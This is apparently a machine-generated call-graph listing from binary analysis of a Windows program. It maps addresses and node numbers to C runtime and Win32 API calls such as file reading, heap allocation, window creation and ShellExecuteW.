InitializeCriticalSectionAndSpinCount _fseek 81683->81775 81685 422370 81684->81685 81686 422374 81684->81686 81685->81612 81687 416fb6 __malloc_crt 69 API calls 81686->81687 81688 422395 _memcpy_s 81687->81688 81689 42239c FreeEnvironmentStringsW 81688->81689 81689->81612 81691 4222e6 _wparse_cmdline 81690->81691 81692 416fb6 __malloc_crt 69 API calls 81691->81692 81693 422329 _wparse_cmdline 81691->81693 81692->81693 81693->81615 81695 42209a _wcslen 81694->81695 81699 416267 81694->81699 81696 416ffb __calloc_crt 69 API calls 81695->81696 81702 4220be _wcslen 81696->81702 81697 422123 81698 413a88 __mtterm 69 API calls 81697->81698 81698->81699 81699->81620 81740 4117af 69 API calls 3 library calls 81699->81740 81700 416ffb __calloc_crt 69 API calls 81700->81702 81701 422149 81703 413a88 __mtterm 69 API calls 81701->81703 81702->81697 81702->81699 81702->81700 81702->81701 81705 422108 81702->81705 81776 426349 69 API calls __vswprintf_l 81702->81776 81703->81699 81705->81702 81777 417d93 10 API calls 3 library calls 81705->81777 81708 41187c __IsNonwritableInCurrentImage 81707->81708 81778 418486 81708->81778 81710 41189a __initterm_e 81711 411421 __cinit 76 API calls 81710->81711 81712 4118b9 __IsNonwritableInCurrentImage __initterm 81710->81712 81711->81712 81712->81623 81714 431bcb 81713->81714 81715 40d80c 81713->81715 81716 4092c0 VariantClear 81715->81716 81717 40d847 81716->81717 81782 40eb50 81717->81782 81720 40d877 81788 411ac6 81720->81788 81725 40d891 81798 40f370 KiUserCallbackDispatcher SystemParametersInfoW 81725->81798 81727 40d89f 81799 40d6d0 GetCurrentDirectoryW 81727->81799 81729 40d8a7 SystemParametersInfoW 81730 40d8d4 81729->81730 81731 40d8cd FreeLibrary 81729->81731 81732 4092c0 VariantClear 81730->81732 81731->81730 81733 40d8dd 81732->81733 81734 4092c0 VariantClear 81733->81734 81735 40d8e6 81734->81735 81735->81628 81742 411a1f 69 API calls _doexit 81735->81742 81736->81601 81737->81605 81738->81613 81739->81616 81740->81620 81741->81625 81742->81628 81743->81631 81744->81641 81745->81649 81746->81659 81750 417004 81747->81750 81749 416f70 81749->81639 81749->81664 81750->81749 81751 417022 Sleep 81750->81751 81755 422452 81750->81755 81752 417037 81751->81752 81752->81749 81752->81750 81753->81668 81754->81645 81756 42245e _fseek 81755->81756 81757 422476 81756->81757 81766 422495 _memset 81756->81766 81768 417f23 69 API calls __getptd_noexit 81757->81768 81759 42247b 81769 417ebb 7 API calls 2 library calls 81759->81769 81761 422507 RtlAllocateHeap 81761->81766 81762 42248b _fseek 81762->81750 81764 418407 __lock 68 API calls 81764->81766 81766->81761 81766->81762 81766->81764 81770 41a74c 5 API calls 2 library calls 81766->81770 81771 42254e LeaveCriticalSection _doexit 81766->81771 81772 411afc 7 API calls __decode_pointer 81766->81772 81768->81759 81770->81766 81771->81766 81772->81766 81773->81671 81774->81679 81775->81683 81776->81702 81777->81705 81780 41848c 81778->81780 81779 41696e __encode_pointer 7 API calls 81779->81780 81780->81779 81781 4184a4 81780->81781 81781->81710 81836 40eb70 81782->81836 81785 40eba0 81786 40eb50 2 API calls 81785->81786 81787 40eba5 81786->81787 81787->81720 81789 418407 __lock 69 API calls 81788->81789 81790 411ad3 81789->81790 81791 4169e9 __decode_pointer 7 API calls 81790->81791 81792 411ade 81791->81792 81793 41696e __encode_pointer 7 API calls 81792->81793 81794 411ae8 81793->81794 81840 41832d LeaveCriticalSection 81794->81840 81796 40d888 81797 411b24 69 API calls __vswprintf_l 81796->81797 81797->81725 81798->81727 81841 401f80 81799->81841 81801 40d6f1 IsDebuggerPresent 81802 431a9d MessageBoxA 81801->81802 81803 40d6ff 81801->81803 81804 431ab6 81802->81804 81803->81804 81805 40d71f 81803->81805 81943 403e90 77 API calls 3 library calls 81804->81943 81911 40f3b0 81805->81911 81808 40d77a 81812 40d782 81808->81812 81814 431b09 SetCurrentDirectoryW 81808->81814 81810 40d73a GetFullPathNameW 81941 401440 129 API calls _wcscat 81810->81941 81813 40d78b 81812->81813 81944 43604b 6 API calls 81812->81944 81923 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 81813->81923 81814->81812 81817 431b28 81817->81813 81819 431b30 GetModuleFileNameW 81817->81819 81821 431ba4 GetForegroundWindow ShellExecuteW 81819->81821 81822 431b4c 81819->81822 81825 40d7c7 81821->81825 81945 401b70 81822->81945 81823 40d795 81831 40d7a8 81823->81831 81931 40e1e0 81823->81931 81828 40d7d1 SetCurrentDirectoryW 81825->81828 81828->81729 81830 431b66 81952 40d3b0 77 API calls 2 library calls 81830->81952 81831->81825 81942 401000 Shell_NotifyIconW _memset 81831->81942 81834 431b72 GetForegroundWindow ShellExecuteW 81835 431b9f 81834->81835 81835->81825 81837 40d86e 81836->81837 81838 40eb76 LoadLibraryA 81836->81838 81837->81720 81837->81785 81838->81837 81839 40eb87 GetProcAddress 81838->81839 81839->81837 81840->81796 81953 40e680 81841->81953 81845 401fa2 GetModuleFileNameW 81971 40ff90 81845->81971 81847 401fbd 81983 4107b0 81847->81983 81850 401b70 77 API calls 81851 401fe4 81850->81851 81986 4019e0 81851->81986 81853 401ff2 81854 4092c0 VariantClear 81853->81854 81855 402002 81854->81855 81856 401b70 77 API calls 81855->81856 81857 40201c 81856->81857 81858 4019e0 78 API calls 81857->81858 81859 40202c 81858->81859 81860 401b70 77 API calls 81859->81860 81861 40203c 81860->81861 81994 40c3e0 81861->81994 81863 40204d 81864 40c060 77 API calls 81863->81864 81865 402061 81864->81865 82012 401a70 81865->82012 81867 40206e 82019 4115d0 81867->82019 81870 42c174 81872 401a70 77 API calls 81870->81872 81871 402088 81873 4115d0 __wcsicoll 81 API calls 81871->81873 81874 42c189 81872->81874 81875 402093 81873->81875 81877 401a70 77 API calls 81874->81877 81875->81874 81876 40209e 81875->81876 81878 4115d0 __wcsicoll 81 API calls 81876->81878 81879 42c1a7 81877->81879 81880 4020a9 81878->81880 81881 42c1b0 GetModuleFileNameW 81879->81881 81880->81881 81882 4020b4 81880->81882 81884 401a70 77 API calls 81881->81884 81883 4115d0 __wcsicoll 81 API calls 81882->81883 81885 4020bf 81883->81885 81886 42c1e2 81884->81886 81887 402107 81885->81887 81892 401a70 77 API calls 81885->81892 81894 42c20a _wcscpy 81885->81894 81888 40df50 77 API calls 81886->81888 81889 402119 81887->81889 81887->81894 81890 42c1f1 81888->81890 81891 42c243 81889->81891 82027 40e7e0 78 API calls 81889->82027 81893 401a70 77 API calls 81890->81893 81896 4020e5 _wcscpy 81892->81896 81897 42c201 81893->81897 81898 401a70 77 API calls 81894->81898 81902 401a70 77 API calls 81896->81902 81897->81894 81909 402148 81898->81909 81899 402132 82028 40d030 78 API calls 81899->82028 81901 40213e 81903 4092c0 VariantClear 81901->81903 81902->81887 81903->81909 81904 402184 81907 4092c0 VariantClear 81904->81907 81910 402196 ctype 81907->81910 81908 401a70 77 API calls 81908->81909 81909->81904 81909->81908 82029 40d030 78 API calls 81909->82029 82030 40e640 78 API calls 81909->82030 81910->81801 81912 42ccf4 _memset 81911->81912 81913 40f3c9 81911->81913 81916 42cd05 GetOpenFileNameW 81912->81916 82710 40ffb0 78 API calls ctype 81913->82710 81915 40f3d2 82711 410130 SHGetMalloc 81915->82711 81916->81913 81918 40d732 81916->81918 81918->81808 81918->81810 81919 40f3d9 82716 410020 90 API calls __wcsicoll 81919->82716 81921 40f3e7 82717 40f400 81921->82717 81924 42b9d3 81923->81924 81925 41025a LoadImageW RegisterClassExW 81923->81925 82757 443e8f EnumResourceNamesW LoadImageW 81924->82757 82756 4102f0 7 API calls 81925->82756 81928 42b9da 81929 40d790 81930 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 81929->81930 81930->81823 81933 40e207 _memset 81931->81933 81932 40e262 81940 40e2a4 81932->81940 82780 43737d 86 API calls __wcsicoll 81932->82780 81933->81932 81934 42aa14 DestroyIcon 81933->81934 81934->81932 81936 40e2c0 Shell_NotifyIconW 82758 401be0 81936->82758 81937 42aa50 Shell_NotifyIconW 81939 40e2da 81939->81831 81940->81936 81940->81937 81941->81808 81942->81825 81943->81808 81944->81817 81946 401b76 _wcslen 81945->81946 81947 41171a 77 API calls 81946->81947 81950 401bc5 81946->81950 81948 401bad _memcpy_s 81947->81948 81949 41171a 77 API calls 81948->81949 81949->81950 81951 40d3b0 77 API calls 2 library calls 81950->81951 81951->81830 81952->81834 81954 40c060 77 API calls 81953->81954 81955 401f90 81954->81955 81956 402940 81955->81956 81957 40294a __write_nolock 81956->81957 82031 4021e0 81957->82031 81960 402972 81964 4029a4 81960->81964 82043 401cf0 81960->82043 81961 402ae0 77 API calls 81961->81964 81962 402abe 81962->81845 81963 402a8c 81963->81962 81965 401b70 77 API calls 81963->81965 81964->81961 81964->81963 81966 401b70 77 API calls 81964->81966 81970 401cf0 77 API calls 81964->81970 82046 40d970 77 API calls 2 library calls 81964->82046 81967 402ab3 81965->81967 81966->81964 82047 40d970 77 API calls 2 library calls 81967->82047 81970->81964 82049 40f5e0 81971->82049 81974 40ffa6 81974->81847 81976 42b6d8 81977 42b6e6 81976->81977 82105 434fe1 81976->82105 81978 413a88 __mtterm 69 API calls 81977->81978 81980 42b6f5 81978->81980 81981 434fe1 108 API calls 81980->81981 81982 42b702 81981->81982 81982->81847 81984 41171a 77 API calls 81983->81984 81985 401fd6 81984->81985 81985->81850 81987 401a03 81986->81987 81992 4019e5 81986->81992 81988 401a1a 81987->81988 81987->81992 82701 404260 78 API calls 81988->82701 81990 4019ff 81990->81853 81991 401a26 81991->81853 81992->81990 82700 404260 78 API calls 81992->82700 81995 40c3e4 81994->81995 81996 40c42c 81994->81996 81997 40c3f0 81995->81997 81998 42a475 81995->81998 81999 42a422 81996->81999 82000 40c435 81996->82000 82001 4042f0 77 API calls 81997->82001 82705 453155 77 API calls 81998->82705 82002 42a427 81999->82002 82003 42a445 81999->82003 82004 40c441 82000->82004 82005 42a455 82000->82005 82011 40c3fb 82001->82011 82002->82011 82702 453155 77 API calls 82002->82702 82703 453155 77 API calls 82003->82703 82006 4042f0 77 API calls 82004->82006 82704 453155 77 API calls 82005->82704 82006->82011 82011->81863 82013 401a90 82012->82013 82014 401a77 82012->82014 82015 4021e0 77 API calls 82013->82015 82016 401a8d 82014->82016 82706 404080 77 API calls _memcpy_s 82014->82706 82017 401a9c 82015->82017 82016->81867 82017->81867 82020 4115e1 82019->82020 82021 411650 82019->82021 82026 40207d 82020->82026 82707 417f23 69 API calls __getptd_noexit 82020->82707 82709 4114bf 81 API calls 3 library calls 82021->82709 82024 4115ed 82708 417ebb 7 API calls 2 library calls 82024->82708 82026->81870 82026->81871 82027->81899 82028->81901 82029->81909 82030->81909 82032 4021f1 _wcslen 82031->82032 82033 42a598 82031->82033 82035 402205 82032->82035 82036 402226 82032->82036 82034 40c740 77 API calls 82033->82034 82037 42a5a2 82034->82037 82048 404020 77 API calls ctype 82035->82048 82039 401380 77 API calls 82036->82039 82041 40222d 82039->82041 82040 40220c _memcpy_s 82040->81960 82041->82037 82042 41171a 77 API calls 82041->82042 82042->82040 82044 402ae0 77 API calls 82043->82044 82045 401cf7 82044->82045 82045->81960 82046->81964 82047->81962 82048->82040 82050 40f580 79 API calls 82049->82050 82051 40f5f8 _strcat ctype 82050->82051 82109 40f6d0 82051->82109 82056 42b2ee 82138 4151b0 82056->82138 82058 40f679 82058->82056 82059 40f681 82058->82059 82125 414e94 82059->82125 82063 40f68b 82063->81974 82068 452574 82063->82068 82065 42b31d 82144 415484 82065->82144 82067 42b33d 82069 41557c _fseek 107 API calls 82068->82069 82070 4525df 82069->82070 82645 4523ce 82070->82645 82073 4525fc 82073->81976 82074 4151b0 __fread_nolock 83 API calls 82075 45261d 82074->82075 82076 4151b0 __fread_nolock 83 API calls 82075->82076 82077 45262e 82076->82077 82078 4151b0 __fread_nolock 83 API calls 82077->82078 82079 452649 82078->82079 82080 4151b0 __fread_nolock 83 API calls 82079->82080 82081 452666 82080->82081 82082 41557c _fseek 107 API calls 82081->82082 82083 452682 82082->82083 82084 4138ba _malloc 69 API calls 82083->82084 82085 45268e 82084->82085 82086 4138ba _malloc 69 API calls 82085->82086 82087 45269b 82086->82087 82088 4151b0 __fread_nolock 83 API calls 82087->82088 82089 4526ac 82088->82089 82090 44afdc GetSystemTimeAsFileTime 82089->82090 82091 4526bf 82090->82091 82092 4526d5 82091->82092 82093 4526fd 82091->82093 82096 413a88 __mtterm 69 API calls 82092->82096 82094 452704 82093->82094 82095 45275b 82093->82095 82651 44b195 82094->82651 82098 413a88 __mtterm 69 API calls 82095->82098 82099 4526df 82096->82099 82104 452759 82098->82104 82100 413a88 __mtterm 69 API calls 82099->82100 82102 4526e8 82100->82102 82101 452753 82103 413a88 __mtterm 69 API calls 82101->82103 82102->81976 82103->82104 82104->81976 82106 434ff1 82105->82106 82107 434feb 82105->82107 82106->81977 82108 414e94 __fcloseall 108 API calls 82107->82108 82108->82106 82110 40f6dd _strlen 82109->82110 82157 40f790 82110->82157 82113 414e06 82176 414d40 82113->82176 82115 40f666 82115->82056 82116 40f450 82115->82116 82120 40f45a _strcat _memcpy_s __write_nolock 82116->82120 82117 4151b0 __fread_nolock 83 API calls 82117->82120 82119 42936d 82121 41557c _fseek 107 API calls 82119->82121 82120->82117 82120->82119 82124 40f531 82120->82124 82259 41557c 82120->82259 82122 429394 82121->82122 82123 4151b0 __fread_nolock 83 API calls 82122->82123 82123->82124 82124->82058 82126 414ea0 _fseek 82125->82126 82127 414ed1 82126->82127 82128 414eb4 82126->82128 82130 415965 __lock_file 70 API calls 82127->82130 82134 414ec9 _fseek 82127->82134 82398 417f23 69 API calls __getptd_noexit 82128->82398 82132 414ee9 82130->82132 82131 414eb9 82399 417ebb 7 API calls 2 library calls 82131->82399 82382 414e1d 82132->82382 82134->82063 82467 41511a 82138->82467 82140 4151c8 82141 44afdc 82140->82141 82638 4431e0 82141->82638 82143 44affd 82143->82065 82145 415490 _fseek 82144->82145 82146 4154bb 82145->82146 82147 41549e 82145->82147 82149 415965 __lock_file 70 API calls 82146->82149 82642 417f23 69 API calls __getptd_noexit 82147->82642 82151 4154c3 82149->82151 82150 4154a3 82643 417ebb 7 API calls 2 library calls 82150->82643 82153 4152e7 __ftell_nolock 73 API calls 82151->82153 82154 4154cf 82153->82154 82644 4154e8 LeaveCriticalSection LeaveCriticalSection _fprintf 82154->82644 82156 4154b3 _fseek 82156->82067 82158 40f7ae _memset 82157->82158 82160 40f628 82158->82160 82161 415258 82158->82161 82160->82113 82162 415285 82161->82162 82163 415268 82161->82163 82162->82163 82165 41528c 82162->82165 82172 417f23 69 API calls __getptd_noexit 82163->82172 82174 41c551 105 API calls 14 library calls 82165->82174 82166 41526d 82173 417ebb 7 API calls 2 library calls 82166->82173 82168 4152b2 82170 41527d 82168->82170 82175 4191c9 103 API calls 7 library calls 82168->82175 82170->82158 82172->82166 82174->82168 82175->82170 82177 414d4c _fseek 82176->82177 82178 414d5f 82177->82178 82180 414d95 82177->82180 82228 417f23 69 API calls __getptd_noexit 82178->82228 82195 41e28c 82180->82195 82181 414d64 82229 417ebb 7 API calls 2 library calls 82181->82229 82184 414d9a 82185 414da1 82184->82185 82186 414dae 82184->82186 82230 417f23 69 API calls __getptd_noexit 82185->82230 82188 414dd6 82186->82188 82189 414db6 82186->82189 82213 41dfd8 82188->82213 82231 417f23 69 API calls __getptd_noexit 82189->82231 82192 414d74 _fseek @_EH4_CallFilterFunc@8 82192->82115 82196 41e298 _fseek 82195->82196 82197 418407 __lock 69 API calls 82196->82197 82208 41e2a6 82197->82208 82198 41e322 82200 416fb6 __malloc_crt 69 API calls 82198->82200 82202 41e32c 82200->82202 82201 41e3b0 _fseek 82201->82184 82207 41e31b 82202->82207 82238 4189e6 InitializeCriticalSectionAndSpinCount _fseek 82202->82238 82204 418344 __mtinitlocknum 69 API calls 82204->82208 82206 41e351 82209 41e35c 82206->82209 82210 41e36f EnterCriticalSection 82206->82210 82233 41e3bb 82207->82233 82208->82198 82208->82204 82208->82207 82236 4159a6 70 API calls __lock 82208->82236 82237 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 82208->82237 82212 413a88 __mtterm 69 API calls 82209->82212 82210->82207 82212->82207 82221 41dffb __wopenfile 82213->82221 82214 41e015 82243 417f23 69 API calls __getptd_noexit 82214->82243 82215 41e1e9 82215->82214 82219 41e247 82215->82219 82217 41e01a 82244 417ebb 7 API calls 2 library calls 82217->82244 82240 425db0 82219->82240 82221->82214 82221->82215 82245 4136bc 81 API calls 2 library calls 82221->82245 82224 41e1e2 82224->82215 82246 4136bc 81 API calls 2 library calls 82224->82246 82226 41e201 82226->82215 82247 4136bc 81 API calls 2 library calls 82226->82247 82228->82181 82230->82192 82231->82192 82232 414dfc LeaveCriticalSection LeaveCriticalSection _fprintf 82232->82192 82239 41832d LeaveCriticalSection 82233->82239 82235 41e3c2 82235->82201 82236->82208 82237->82208 82238->82206 82239->82235 82248 425ce4 82240->82248 82242 414de1 82242->82232 82243->82217 82245->82224 82246->82226 82247->82215 82251 425cf0 _fseek 82248->82251 82249 425d03 82250 417f23 __vswprintf_l 69 API calls 82249->82250 82252 425d08 82250->82252 82251->82249 82253 425d41 82251->82253 82254 417ebb __vswprintf_l 7 API calls 82252->82254 82255 4255c4 __tsopen_nolock 134 API calls 82253->82255 82258 425d17 _fseek 82254->82258 82256 425d5b 82255->82256 82257 425d82 __sopen_helper LeaveCriticalSection 82256->82257 82257->82258 82258->82242 82260 415588 _fseek 82259->82260 82261 415596 82260->82261 82262 4155c4 82260->82262 82290 417f23 69 API calls __getptd_noexit 82261->82290 82272 415965 82262->82272 82265 41559b 82291 417ebb 7 API calls 2 library calls 82265->82291 82271 4155ab _fseek 82271->82120 82273 415977 82272->82273 82274 415999 EnterCriticalSection 82272->82274 82273->82274 82276 41597f 82273->82276 82275 4155cc 82274->82275 82278 4154f2 82275->82278 82277 418407 __lock 69 API calls 82276->82277 82277->82275 82279 415512 82278->82279 82280 415502 82278->82280 82281 415524 82279->82281 82293 4152e7 82279->82293 82347 417f23 69 API calls __getptd_noexit 82280->82347 82310 41486c 82281->82310 82285 415507 82292 4155f7 LeaveCriticalSection LeaveCriticalSection _fprintf 82285->82292 82290->82265 82292->82271 82294 41531a 82293->82294 82295 4152fa 82293->82295 82297 41453a __fileno 69 API calls 82294->82297 82348 417f23 69 API calls __getptd_noexit 82295->82348 82299 415320 82297->82299 82298 4152ff 82349 417ebb 7 API calls 2 library calls 82298->82349 82301 41efd4 __locking 73 API calls 82299->82301 82302 415335 82301->82302 82303 4153a9 82302->82303 82305 415364 82302->82305 82309 41530f 82302->82309 82350 417f23 69 API calls __getptd_noexit 82303->82350 82306 41efd4 __locking 73 API calls 82305->82306 82305->82309 82307 415404 82306->82307 82308 41efd4 __locking 73 API calls 82307->82308 82307->82309 82308->82309 82309->82281 82311 4148a7 82310->82311 82312 414885 82310->82312 82316 41453a 82311->82316 82312->82311 82313 41453a __fileno 69 API calls 82312->82313 82314 4148a0 82313->82314 82351 41c3cf 103 API calls 6 library calls 82314->82351 82317 41455e 82316->82317 82318 414549 82316->82318 82322 41efd4 82317->82322 82352 417f23 69 API calls __getptd_noexit 82318->82352 82320 41454e 82353 417ebb 7 API calls 2 library calls 82320->82353 82323 41efe0 _fseek 82322->82323 82324 41f003 82323->82324 82325 41efe8 82323->82325 82327 41f011 82324->82327 82330 41f052 82324->82330 82374 417f36 69 API calls __getptd_noexit 82325->82374 82376 417f36 69 API calls __getptd_noexit 82327->82376 82328 41efed 82375 417f23 69 API calls __getptd_noexit 82328->82375 82354 41ba3b 82330->82354 82332 41f016 82377 417f23 69 API calls __getptd_noexit 82332->82377 82334 41eff5 _fseek 82334->82285 82336 41f058 82339 41f065 82336->82339 82340 41f07b 82336->82340 82337 41f01d 82378 417ebb 7 API calls 2 library calls 82337->82378 82364 41ef5f 82339->82364 82379 417f23 69 API calls __getptd_noexit 82340->82379 82343 41f080 82380 417f36 69 API calls __getptd_noexit 82343->82380 82344 41f073 82381 41f0a6 LeaveCriticalSection __unlock_fhandle 82344->82381 82347->82285 82348->82298 82350->82309 82351->82311 82352->82320 82356 41ba47 _fseek 82354->82356 82355 41baa2 82357 41bac4 _fseek 82355->82357 82358 41baa7 EnterCriticalSection 82355->82358 82356->82355 82359 418407 __lock 69 API calls 82356->82359 82357->82336 82358->82357 82360 41ba73 82359->82360 82361 41ba8a 82360->82361 82363 4189e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 82360->82363 82362 41bad2 ___lock_fhandle LeaveCriticalSection 82361->82362 82362->82355 82363->82361 82365 41b9c4 __chsize_nolock 69 API calls 82364->82365 82366 41ef6e 82365->82366 82367 41ef84 SetFilePointer 82366->82367 82368 41ef74 82366->82368 82370 41efa3 82367->82370 82371 41ef9b GetLastError 82367->82371 82369 417f23 __vswprintf_l 69 API calls 82368->82369 82372 41ef79 82369->82372 82370->82372 82373 417f49 __dosmaperr 69 API calls 82370->82373 82371->82370 82372->82344 82373->82372 82374->82328 82375->82334 82376->82332 82377->82337 82379->82343 82380->82344 82381->82334 82383 414e31 82382->82383 82384 414e4d 82382->82384 82428 417f23 69 API calls __getptd_noexit 82383->82428 82387 41486c __flush 103 API calls 82384->82387 82396 414e46 82384->82396 82386 414e36 82429 417ebb 7 API calls 2 library calls 82386->82429 82389 414e59 82387->82389 82401 41e680 82389->82401 82392 41453a __fileno 69 API calls 82393 414e67 82392->82393 82405 41e5b3 82393->82405 82395 414e6d 82395->82396 82397 413a88 __mtterm 69 API calls 82395->82397 82400 414f08 LeaveCriticalSection LeaveCriticalSection _fprintf 82396->82400 82397->82396 82398->82131 82400->82134 82402 41e690 82401->82402 82403 414e61 82401->82403 82402->82403 82404 413a88 __mtterm 69 API calls 82402->82404 82403->82392 82404->82403 82406 41e5bf _fseek 82405->82406 82407 41e5e2 82406->82407 82408 41e5c7 82406->82408 82409 41e5f0 82407->82409 82414 41e631 82407->82414 82445 417f36 69 API calls __getptd_noexit 82408->82445 82447 417f36 69 API calls __getptd_noexit 82409->82447 82412 41e5cc 82446 417f23 69 API calls __getptd_noexit 82412->82446 82413 41e5f5 82448 417f23 69 API calls __getptd_noexit 82413->82448 82417 41ba3b ___lock_fhandle 70 API calls 82414->82417 82420 41e637 82417->82420 82418 41e5d4 _fseek 82418->82395 82419 41e5fc 82449 417ebb 7 API calls 2 library calls 82419->82449 82422 41e652 82420->82422 82423 41e644 82420->82423 82450 417f23 69 API calls __getptd_noexit 82422->82450 82430 41e517 82423->82430 82426 41e64c 82451 41e676 LeaveCriticalSection __unlock_fhandle 82426->82451 82428->82386 82452 41b9c4 82430->82452 82432 41e57d 82465 41b93e 70 API calls 2 library calls 82432->82465 82433 41e527 82433->82432 82435 41b9c4 __chsize_nolock 69 API calls 82433->82435 82444 41e55b 82433->82444 82438 41e552 82435->82438 82436 41b9c4 __chsize_nolock 69 API calls 82439 41e567 CloseHandle 82436->82439 82437 41e585 82443 41e5a7 82437->82443 82466 417f49 69 API calls 3 library calls 82437->82466 82441 41b9c4 __chsize_nolock 69 API calls 82438->82441 82439->82432 82442 41e573 GetLastError 82439->82442 82441->82444 82442->82432 82443->82426 82444->82432 82444->82436 82445->82412 82446->82418 82447->82413 82448->82419 82450->82426 82451->82418 82453 41b9d1 82452->82453 82456 41b9e9 82452->82456 82454 417f36 __set_osfhnd 69 API calls 82453->82454 82455 41b9d6 82454->82455 82458 417f23 __vswprintf_l 69 API calls 82455->82458 82457 417f36 __set_osfhnd 69 API calls 82456->82457 82459 41ba2e 82456->82459 82460 41ba17 82457->82460 82462 41b9de 82458->82462 82459->82433 82461 417f23 __vswprintf_l 69 API calls 82460->82461 82463 41ba1e 82461->82463 82462->82433 82464 417ebb __vswprintf_l 7 API calls 82463->82464 82464->82459 82465->82437 82466->82443 82468 415126 _fseek 82467->82468 82469 41516f 82468->82469 82470 415164 _fseek 82468->82470 82472 41513a _memset 82468->82472 82471 415965 __lock_file 70 API calls 82469->82471 82470->82140 82474 415177 82471->82474 82496 417f23 69 API calls __getptd_noexit 82472->82496 82480 414f10 82474->82480 82475 415154 82497 417ebb 7 API calls 2 library calls 82475->82497 82484 414f2e _memset 82480->82484 82486 414f4c 82480->82486 82481 414f37 82549 417f23 69 API calls __getptd_noexit 82481->82549 82483 414f8b 82483->82486 82488 4150a9 _memset 82483->82488 82489 4150d5 _memset 82483->82489 82491 41453a __fileno 69 API calls 82483->82491 82499 41ed9e 82483->82499 82529 41e6b1 82483->82529 82551 41ee9b 69 API calls 3 library calls 82483->82551 82484->82481 82484->82483 82484->82486 82498 4151a6 LeaveCriticalSection LeaveCriticalSection _fprintf 82486->82498 82552 417f23 69 API calls __getptd_noexit 82488->82552 82553 417f23 69 API calls __getptd_noexit 82489->82553 82491->82483 82495 414f3c 82550 417ebb 7 API calls 2 library calls 82495->82550 82496->82475 82498->82470 82500 41edaa _fseek 82499->82500 82501 41edb2 82500->82501 82502 41edcd 82500->82502 82623 417f36 69 API calls __getptd_noexit 82501->82623 82504 41eddb 82502->82504 82507 41ee1c 82502->82507 82625 417f36 69 API calls __getptd_noexit 82504->82625 82505 41edb7 82624 417f23 69 API calls __getptd_noexit 82505->82624 82511 41ee29 82507->82511 82512 41ee3d 82507->82512 82509 41ede0 82626 417f23 69 API calls __getptd_noexit 82509->82626 82628 417f36 69 API calls __getptd_noexit 82511->82628 82516 41ba3b ___lock_fhandle 70 API calls 82512->82516 82513 41edbf _fseek 82513->82483 82514 41ede7 82627 417ebb 7 API calls 2 library calls 82514->82627 82518 41ee43 82516->82518 82517 41ee2e 82629 417f23 69 API calls __getptd_noexit 82517->82629 82521 41ee50 82518->82521 82522 41ee66 82518->82522 82554 41e7dc 82521->82554 82630 417f23 69 API calls __getptd_noexit 82522->82630 82525 41ee6b 82631 417f36 69 API calls __getptd_noexit 82525->82631 82526 41ee5e 82632 41ee91 LeaveCriticalSection __unlock_fhandle 82526->82632 82530 41e6c1 82529->82530 82533 41e6de 82529->82533 82636 417f23 69 API calls __getptd_noexit 82530->82636 82532 41e6c6 82637 417ebb 7 API calls 2 library calls 82532->82637 82535 41e713 82533->82535 82543 41e6d6 82533->82543 82633 423600 82533->82633 82537 41453a __fileno 69 API calls 82535->82537 82538 41e727 82537->82538 82539 41ed9e __read 81 API calls 82538->82539 82540 41e72e 82539->82540 82541 41453a __fileno 69 API calls 82540->82541 82540->82543 82542 41e751 82541->82542 82542->82543 82544 41453a __fileno 69 API calls 82542->82544 82543->82483 82545 41e75d 82544->82545 82545->82543 82546 41453a __fileno 69 API calls 82545->82546 82547 41e769 82546->82547 82548 41453a __fileno 69 API calls 82547->82548 82548->82543 82549->82495 82551->82483 82552->82495 82553->82495 82555 41e813 82554->82555 82556 41e7f8 82554->82556 82558 41e822 82555->82558 82560 41e849 82555->82560 82557 417f36 __set_osfhnd 69 API calls 82556->82557 82559 41e7fd 82557->82559 82561 417f36 __set_osfhnd 69 API calls 82558->82561 82563 417f23 __vswprintf_l 69 API calls 82559->82563 82562 41e868 82560->82562 82577 41e87c 82560->82577 82564 41e827 82561->82564 82565 417f36 __set_osfhnd 69 API calls 82562->82565 82574 41e805 82563->82574 82567 417f23 __vswprintf_l 69 API calls 82564->82567 82569 41e86d 82565->82569 82566 41e8d4 82568 417f36 __set_osfhnd 69 API calls 82566->82568 82570 41e82e 82567->82570 82572 41e8d9 82568->82572 82573 417f23 __vswprintf_l 69 API calls 82569->82573 82571 417ebb __vswprintf_l 7 API calls 82570->82571 82571->82574 82575 417f23 __vswprintf_l 69 API calls 82572->82575 82576 41e874 82573->82576 82574->82526 82575->82576 82579 417ebb __vswprintf_l 7 API calls 82576->82579 82577->82566 82577->82574 82578 41e8b0 82577->82578 82580 41e8f5 82577->82580 82578->82566 82581 41e8bb ReadFile 82578->82581 82579->82574 82583 416fb6 __malloc_crt 69 API calls 82580->82583 82584 41ed62 GetLastError 82581->82584 82585 41e9e7 82581->82585 82586 41e90b 82583->82586 82587 41ebe8 82584->82587 82588 41ed6f 82584->82588 82585->82584 82592 41e9fb 82585->82592 82589 41e931 82586->82589 82590 41e913 82586->82590 82596 417f49 __dosmaperr 69 API calls 82587->82596 82602 41eb6d 82587->82602 82594 417f23 __vswprintf_l 69 API calls 82588->82594 82593 423462 __lseeki64_nolock 71 API calls 82589->82593 82591 417f23 __vswprintf_l 69 API calls 82590->82591 82595 41e918 82591->82595 82592->82602 82603 41ea17 82592->82603 82606 41ec2d 82592->82606 82597 41e93d 82593->82597 82598 41ed74 82594->82598 82600 417f36 __set_osfhnd 69 API calls 82595->82600 82596->82602 82597->82581 82599 417f36 __set_osfhnd 69 API calls 82598->82599 82599->82602 82600->82574 82601 413a88 __mtterm 69 API calls 82601->82574 82602->82574 82602->82601 82604 41ea7d ReadFile 82603->82604 82613 41eafa 82603->82613 82607 41ea9b GetLastError 82604->82607 82615 41eaa5 82604->82615 82605 41eca5 ReadFile 82608 41ecc4 GetLastError 82605->82608 82616 41ecce 82605->82616 82606->82602 82606->82605 82607->82603 82607->82615 82608->82606 82608->82616 82609 41ebbe MultiByteToWideChar 82609->82602 82610 41ebe2 GetLastError 82609->82610 82610->82587 82611 41eb75 82618 41eb32 82611->82618 82619 41ebac 82611->82619 82612 41eb68 82614 417f23 __vswprintf_l 69 API calls 82612->82614 82613->82602 82613->82611 82613->82612 82613->82618 82614->82602 82615->82603 82620 423462 __lseeki64_nolock 71 API calls 82615->82620 82616->82606 82617 423462 __lseeki64_nolock 71 API calls 82616->82617 82617->82616 82618->82609 82621 423462 __lseeki64_nolock 71 API calls 82619->82621 82620->82615 82622 41ebbb 82621->82622 82622->82609 82623->82505 82624->82513 82625->82509 82626->82514 